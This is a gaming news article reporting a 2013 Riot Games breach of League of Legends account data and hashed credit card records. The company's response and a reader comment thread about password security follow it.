bit-gamer.net

League of Legends breach leaks passwords, credit cards

League of Legends breach leaks passwords, credit cards

League of Legends players in the US have been warned that an attack has seen persons unknown obtained salted hashes of passwords and, worryingly, credit cards.

League of Legends developer Riot Games has admitted to a security breach which has seen attackers make off with usernames, passwords and credit card details of some 120,000 of its customers.

League of Legends, released in 2009, quickly became one of the most popular competitive multiplayer games around. Tournaments are often held with prize funds in the thousands of pounds - but some ne'er-do-wells have found an easier way to use the game to get rich: stealing credit card details.

The company has confirmed that attackers have made off with data held on its North American customers including usernames, email addresses, password hashes, and first and last names. More worryingly, around 120,000 transaction records from 2011 were also accessed - including hashed credit card numbers.

'The payment system involved with these records hasn't been used since July of 2011, and this type of payment card information hasn't been collected in any Riot systems since then,' a statement on the matter attributed to Riot's Marc Merril and Brandon Beck claims. 'We are taking appropriate action to notify and safeguard affected players. We will be contacting these players via the email addresses currently associated with their accounts to alert them.'

The seriousness of the breach is somewhat mitigated by the company's data protection measures: all passwords and credit card details held on the system were scrambled using a one-way hash function and further protected using a salt - meaning two identical passwords will generate two different hashes, making brute-force attacks on the database significantly more difficult.

That doesn't mean attacks are impossible, however with common passwords, especially those that can be found in a dictionary, will likely have had their passwords cracked already; credit card numbers, meanwhile, are also susceptible to brute force attacks despite their length thanks to the use of only digits in their make-up.

'As a measure to make your accounts safer, within the next 24 hours we’ll require players with accounts in North America to change their passwords to stronger ones that are much harder to guess,' the company's statement adds. 'Additionally, new security features that are currently in development include: email verification: all new registrations and account changes will need to be associated with a valid email address (we’ll also require all existing players to provide a valid email address); two-factor authentication: changes to account email or password will require verification via email or mobile SMS.

'We’re sincerely sorry about this situation,' the company concludes. 'We apologise for the inconvenience and will continue to focus on account security going forward.'

7 Comments

Discuss in the forums Reply
Guinevere 21st August 2013, 10:34 Quote
It does beg the question if the payment system hasn't been used since 2011 why did they keep the hashed CC details in the database?
Code:
UPDATE customers_table
SET cc_hash = '<safe>'
WHERE date < '1/1/2012' AND security = 'Security? What security!'
runadumb 21st August 2013, 10:40 Quote
At this point hackers dictionaries are so large and complex that even passwords many believe to be secure get hacked in minutes.

We need a replacement for passwords and we need it yesterday.
WarrenJ 21st August 2013, 10:43 Quote
or just have a very strong password.
runadumb 21st August 2013, 11:11 Quote
Quote:
Originally Posted by WarrenJ
or just have a very strong password.

Like qeadzcwrsfxv1331? That's a strong password right?
Oh, turns out it isn't http://arstechnica.com/security/2013/05/how-crackers-make-minced-meat-out-of-your-passwords/

Now we have to use password managers to remember all these individual crazy passwords but that's a single point of failure. That really worries me.
Artanix 21st August 2013, 11:18 Quote
Quote:
More worryingly, around 120,000 transaction records from 2011 were also accessed - including hashed credit card numbers.
I thought it's illegal for any merchant to keep transaction details for more than a short period of time?

The record of the transaction itself is kept, but I thought you can't keep any sort of card/personal details on file for too long?
LordPyrinc 21st August 2013, 12:12 Quote
Quote:
Originally Posted by runadumb
Like qeadzcwrsfxv1331? That's a strong password right?
Oh, turns out it isn't http://arstechnica.com/security/2013/05/how-crackers-make-minced-meat-out-of-your-passwords/

Now we have to use password managers to remember all these individual crazy passwords but that's a single point of failure. That really worries me.

Great link. Very enlightening. Scary, but informative.

Requiring users to change their password on a frequent basis would also help to mitigate some of the risk. As is, most sites only require a change once a data breach has happened. By then it could be too late, especially considering how long some companies drag their feet before publicizing the breach and notifying its customers.
runadumb 21st August 2013, 12:51 Quote
Changing your passwords frequently, in my experience, leads to lower security as you now not only have to remember dozens (at least) passwords but also come up with new ones and then remember them.

Bearing in mind each should be at least 12 characters in length, use numbers and a combination of uppercase/lowercase letters spaced out and not just at the beginning or end of a word and not use names, films or anything else that is now in a hackers dictionary.

Passwords suck is what I'm saying.
Log in

You are not logged in, please login with your forum account below. If you don't already have an account please register to start contributing.



Discuss in the forums